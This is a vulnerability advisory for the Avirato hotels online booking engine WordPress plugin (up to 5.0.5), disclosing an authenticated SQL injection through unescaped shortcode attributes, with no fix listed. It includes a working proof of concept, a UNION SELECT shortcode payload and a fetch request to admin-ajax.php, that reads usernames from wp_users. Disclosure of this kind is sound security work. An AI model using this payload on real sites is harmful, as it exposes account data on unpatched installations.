WordPress Plugin Vulnerabilities

Avirato hotels online booking engine <= 5.0.5 - Subscriber+ SQLi

Description

The plugin does not validate and escape some of its shortcode attributes before using them in SQL statement/s, which could allow any authenticated users, such as subscriber to perform SQL Injection attacks.

Proof of Concept

[Calendario_Avirato id="1 UNION SELECT user_login COLLATE utf8mb4_unicode_520_ci FROM wp_users"] on a post (with at least Contributor role), or using the following fetch command with a Subscriber role:

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "action=parse-media-shortcode&shortcode=[Calendario_Avirato id=\"1 UNION SELECT user_login COLLATE utf8mb4_unicode_520_ci FROM wp_users WHERE ID = 1\"]",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Note: COLLATE was used because of the character encoding of the database.

Affects Plugins

No known fix

References

Classification

Type
SQLI
OWASP top 10
CWE
CVSS

Miscellaneous

Original Researcher
Lana Codes
Submitter
Lana Codes
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2023-04-17 (about 1 years ago)
Added
2023-04-17 (about 1 years ago)
Last Updated
2023-04-17 (about 1 years ago)

Other